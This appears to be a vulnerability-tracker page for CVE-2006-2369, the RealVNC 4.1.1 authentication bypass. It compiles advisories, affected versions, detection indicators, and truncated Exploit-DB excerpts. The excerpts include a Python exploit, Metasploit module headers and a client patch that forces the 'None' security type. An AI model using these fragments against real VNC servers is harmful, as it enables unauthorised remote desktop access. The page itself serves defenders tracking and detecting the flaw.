CVE-2006-2369
published 2006-05-15CVE-2006-2369: RealVNC 4.1.1, and other products that use RealVNC such as AdderLink IP and Cisco CallManager, allows remote attackers to bypass authentication via a request…
PriorityP277high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
91.52%
99.8th percentile
RealVNC 4.1.1, and other products that use RealVNC such as AdderLink IP and Cisco CallManager, allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, as originally demonstrated using a long password.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| any1 | neatvnc | < 0.8.1 | 0.8.1 |
| any1 | neatvnc | >= 0 < 0.8.0+dfsg-2 | 0.8.0+dfsg-2 |
| any1 | neatvnc | >= 0 < 0.8.0+dfsg-2 | 0.8.0+dfsg-2 |
| debian | libvncserver | < libvncserver 0.8.2-1 (bookworm) | libvncserver 0.8.2-1 (bookworm) |
| debian | neatvnc | < neatvnc 0.8.0+dfsg-2 (forky) | neatvnc 0.8.0+dfsg-2 (forky) |
| libvncserver | libvncserver | — | — |
| libvncserver_project | libvncserver | >= 0 < 0.8.2-1 | 0.8.2-1 |
| libvncserver_project | libvncserver | >= 0 < 0.8.2-1 | 0.8.2-1 |
| libvncserver_project | libvncserver | >= 0 < 0.8.2-1 | 0.8.2-1 |
| libvncserver_project | libvncserver | >= 0 < 0.8.2-1 | 0.8.2-1 |
| vnc | realvnc | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x01\x01 (NULL auth type advertised to client)
bytes↗
\x00\x00\x00\x00 (auth result success spoofed to client)
bytes↗
\x01 (secTypeNone sent to server)
- →Detect VNC servers advertising only NULL (secTypeNone = 0x01) authentication — a server sending exactly the two-byte sequence 0x01 0x01 indicates only None auth is offered, which is the bypass condition. ↗
- →Flag VNC handshakes where the RFB protocol version is exactly 'RFB 003.008' followed by a client selecting security type 0x01 (None) — this is the vulnerable negotiation path for RealVNC 4.1.0/4.1.1. ↗
- →Monitor for a MitM proxy pattern on port 5900 where a client receives 0x01 0x01 (only None auth) but the upstream server originally offered multiple auth methods — indicative of the bypass proxy technique. ↗
- →Use the Metasploit auxiliary scanner module for VNC None-auth detection as a proactive sweep against exposed VNC services. ↗
- ·The vulnerability affects only RealVNC versions 4.1.0 and 4.1.1; the exploit checks for the exact RFB 003.008 banner to confirm vulnerability before proceeding. ↗
- ·CVE-2024-42458 in Neat VNC (neatvnc before 0.8.1) is a related but distinct issue — it also fails to properly validate the security type, so detection logic for improper security-type negotiation applies to both. ↗
- ·The exploit operates as a transparent proxy (MitM) between a VNC client and server; detection must account for the attacker-controlled relay rather than a direct client-to-server connection. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5HIGH
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
CVE-2024-42458: server
osv·2024-08-02·CVSS 7.5
CVE-2024-42458 [HIGH] CVE-2024-42458: server
server.c in Neat VNC (aka neatvnc) before 0.8.1 does not properly validate the security type, a related issue to CVE-2006-2369.
GHSA
GHSA-ghjj-rq7v-wjhm: auth
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-2450 [HIGH] GHSA-ghjj-rq7v-wjhm: auth
auth.c in LibVNCServer 0.7.1 allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, a different issue than CVE-2006-2369.
GHSA
GHSA-p5jc-gpgq-6vfg: RealVNC 4
ghsa_unreviewed·2022-05-01
CVE-2006-2369 [HIGH] CWE-287 GHSA-p5jc-gpgq-6vfg: RealVNC 4
RealVNC 4.1.1, and other products that use RealVNC such as AdderLink IP and Cisco CallManager, allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, as originally demonstrated using a long password.
OSV
CVE-2006-2450: auth
osv·2006-07-18·CVSS 7.5
CVE-2006-2450 [HIGH] CVE-2006-2450: auth
auth.c in LibVNCServer 0.7.1 allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, a different issue than CVE-2006-2369.
OSV
CVE-2006-2369: RealVNC 4
osv·2006-05-15·CVSS 7.5
CVE-2006-2369 [HIGH] CVE-2006-2369: RealVNC 4
RealVNC 4.1.1, and other products that use RealVNC such as AdderLink IP and Cisco CallManager, allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, as originally demonstrated using a long password.
Debian
CVE-2024-42458: neatvnc - server.c in Neat VNC (aka neatvnc) before 0.8.1 does not properly validate the s...
vendor_debian·2024·CVSS 7.5
CVE-2024-42458 [HIGH] CVE-2024-42458: neatvnc - server.c in Neat VNC (aka neatvnc) before 0.8.1 does not properly validate the s...
server.c in Neat VNC (aka neatvnc) before 0.8.1 does not properly validate the security type, a related issue to CVE-2006-2369.
Scope: local
bookworm: open
forky: resolved (fixed in 0.8.0+dfsg-2)
sid: resolved (fixed in 0.8.0+dfsg-2)
trixie: resolved (fixed in 0.8.0+dfsg-2)
Debian
CVE-2006-2450: libvncserver - auth.c in LibVNCServer 0.7.1 allows remote attackers to bypass authentication vi...
vendor_debian·2006·CVSS 7.5
CVE-2006-2450 [HIGH] CVE-2006-2450: libvncserver - auth.c in LibVNCServer 0.7.1 allows remote attackers to bypass authentication vi...
auth.c in LibVNCServer 0.7.1 allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, a different issue than CVE-2006-2369.
Scope: local
bookworm: resolved (fixed in 0.8.2-1)
bullseye: resolved (fixed in 0.8.2-1)
forky: resolved (fixed in 0.8.2-1)
sid: resolved (fixed in 0.8.2-1)
trixie: resolved (fixed in 0.8.2-1)
Red Hat
CVE-2006-2450: auth
vendor_redhat·CVSS 7.5
CVE-2006-2450 [HIGH] CVE-2006-2450: auth
auth.c in LibVNCServer 0.7.1 allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, a different issue than CVE-2006-2369.
Statement: Not vulnerable. This issue does not affect the versions of LibVNCServer as distributed with Red Hat Enterprise Linux 2.1, 3, or 4.
Red Hat
CVE-2006-2369: RealVNC 4
vendor_redhat·CVSS 7.5
CVE-2006-2369 [HIGH] CVE-2006-2369: RealVNC 4
RealVNC 4.1.1, and other products that use RealVNC such as AdderLink IP and Cisco CallManager, allows remote attackers to bypass authentication via a request in which the client specifies an insecure security type such as "Type 1 - None", which is accepted even if it is not offered by the server, as originally demonstrated using a long password.
Statement: This issue only affected version 4.1.1 and not the versions distributed with Red Hat Enterprise Linux 2.1, 3, or 4.
No detection rules found.
Exploit-DB
RealVNC 4.1.0/4.1.1 - Authentication Bypass
exploitdb·2012-05-13·CVSS 7.5
CVE-2006-2369 [HIGH] RealVNC 4.1.0/4.1.1 - Authentication Bypass
RealVNC 4.1.0/4.1.1 - Authentication Bypass
---
# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
# Date: 2012-05-13
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1.0 and 4.1.1
# Tested on: Windows XP
# CVE: CVE-2006-2369
# Requires vncviewer installed
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
import select
import thread
import os
import socket
import sys, re
BIND_ADDR = '127.0.0.1'
BIND_PORT = 4444
def pwn4ge(host, port):
socket.setdefaulttimeout(5)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((host, port))
except socket.error, msg:
print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
sys.exit();
else:
hello
Exploit-DB
RealVNC - Authentication Bypass (Metasploit)
exploitdb·2011-08-26·CVSS 7.5
CVE-2006-2369 [HIGH] RealVNC - Authentication Bypass (Metasploit)
RealVNC - Authentication Bypass (Metasploit)
---
##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'RealVNC Authentication Bypass',
'Description' => %q{
This module exploits an Authentication Bypass Vulnerability
in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
listener on LPORT and proxies to the target server
The AUTOVNC option requires that vncviewer be installed on
the attacking machine. This option should be disabled for Pro
},
'Author' =>
[
'hdm', #origin
Exploit-DB
RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass
exploitdb·2006-05-16
CVE-2006-2369 RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass
RealVNC 4.1.0 writeU8(secType);
+
+ // [BL4CK] In response to the VNC Null Authentication
+ // force a secType to equal secTypeNone
+ // http://blacksecurity.org
+ secType = secTypeNone;
+ os->writeU8(secTypeNone);
os->flush();
vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType); }
E-DB Note:
Compiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)
Exploit-DB
RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)
exploitdb·2006-05-15
CVE-2006-2369 RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)
RealVNC 4.1.0 'RealVNC 4.1 Authentication Bypass',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore ' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits an authentication bypass flaw in version
4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy
between a VNC client and a vulnerable server. Credit for this should
go to James Evans, who spent the time to figure this out after RealVNC
released a binary-only patch.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'LPORT' => [ 1, 'PORT', 'The local VNC listener port', 5900 ],
'LHOST' => [ 1, 'HOST', 'The local VNC listener host', "0.0.0.0" ],
'RPORT' => [ 1, 'PORT', 'The remote VNC target port', 5900 ],
'RHOST' => [ 1, 'HOST', 'The remote VNC target host'],
'AUTOCONNECT' => [1, 'DATA', 'Aut
Metasploit
VNC Authentication None Detection
metasploit
VNC Authentication None Detection
VNC Authentication None Detection
Detect VNC servers that support the "None" authentication method.
Metasploit
RealVNC NULL Authentication Mode Bypass
metasploit
RealVNC NULL Authentication Mode Bypass
RealVNC NULL Authentication Mode Bypass
This module exploits an Authentication bypass vulnerability in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy listener on LPORT and proxies to the target server. The AUTOVNC option requires that vncviewer be installed on the attacking machine.
http://marc.info/?l=full-disclosure&m=114768344111131&w=2http://marc.info/?l=vnc-list&m=114755444130188&w=2http://seclists.org/fulldisclosure/2022/May/29http://secunia.com/advisories/20107http://secunia.com/advisories/20109http://secunia.com/advisories/20789http://securityreason.com/securityalert/8355http://securitytracker.com/id?1016083http://www.cisco.com/warp/public/707/cisco-sr-20060622-cmm.shtmlhttp://www.intelliadmin.com/blog/2006/05/security-flaw-in-realvnc-411.htmlhttp://www.intelliadmin.com/blog/2006/05/vnc-flaw-proof-of-concept.htmlhttp://www.kb.cert.org/vuls/id/117929http://www.osvdb.org/25479http://www.realvnc.com/products/free/4.1/release-notes.htmlhttp://www.securityfocus.com/archive/1/433994/100/0/threadedhttp://www.securityfocus.com/archive/1/434015/100/0/threadedhttp://www.securityfocus.com/archive/1/434117/100/0/threadedhttp://www.securityfocus.com/archive/1/434518/100/0/threadedhttp://www.securityfocus.com/archive/1/434560/100/0/threadedhttp://www.securityfocus.com/archive/1/438175/100/0/threadedhttp://www.securityfocus.com/archive/1/438368/100/0/threadedhttp://www.securityfocus.com/bid/17978http://www.vupen.com/english/advisories/2006/1790http://www.vupen.com/english/advisories/2006/1821http://www.vupen.com/english/advisories/2006/2492https://exchange.xforce.ibmcloud.com/vulnerabilities/26445http://marc.info/?l=full-disclosure&m=114768344111131&w=2http://marc.info/?l=vnc-list&m=114755444130188&w=2http://seclists.org/fulldisclosure/2022/May/29http://secunia.com/advisories/20107http://secunia.com/advisories/20109http://secunia.com/advisories/20789http://securityreason.com/securityalert/8355http://securitytracker.com/id?1016083http://www.cisco.com/warp/public/707/cisco-sr-20060622-cmm.shtmlhttp://www.intelliadmin.com/blog/2006/05/security-flaw-in-realvnc-411.htmlhttp://www.intelliadmin.com/blog/2006/05/vnc-flaw-proof-of-concept.htmlhttp://www.kb.cert.org/vuls/id/117929http://www.openwall.com/lists/oss-security/2024/08/02/8http://www.osvdb.org/25479http://www.realvnc.com/products/free/4.1/release-notes.htmlhttp://www.securityfocus.com/archive/1/433994/100/0/threadedhttp://www.securityfocus.com/archive/1/434015/100/0/threadedhttp://www.securityfocus.com/archive/1/434117/100/0/threadedhttp://www.securityfocus.com/archive/1/434518/100/0/threadedhttp://www.securityfocus.com/archive/1/434560/100/0/threadedhttp://www.securityfocus.com/archive/1/438175/100/0/threadedhttp://www.securityfocus.com/archive/1/438368/100/0/threadedhttp://www.securityfocus.com/bid/17978http://www.vupen.com/english/advisories/2006/1790http://www.vupen.com/english/advisories/2006/1821http://www.vupen.com/english/advisories/2006/2492https://exchange.xforce.ibmcloud.com/vulnerabilities/26445
2006-05-15
Published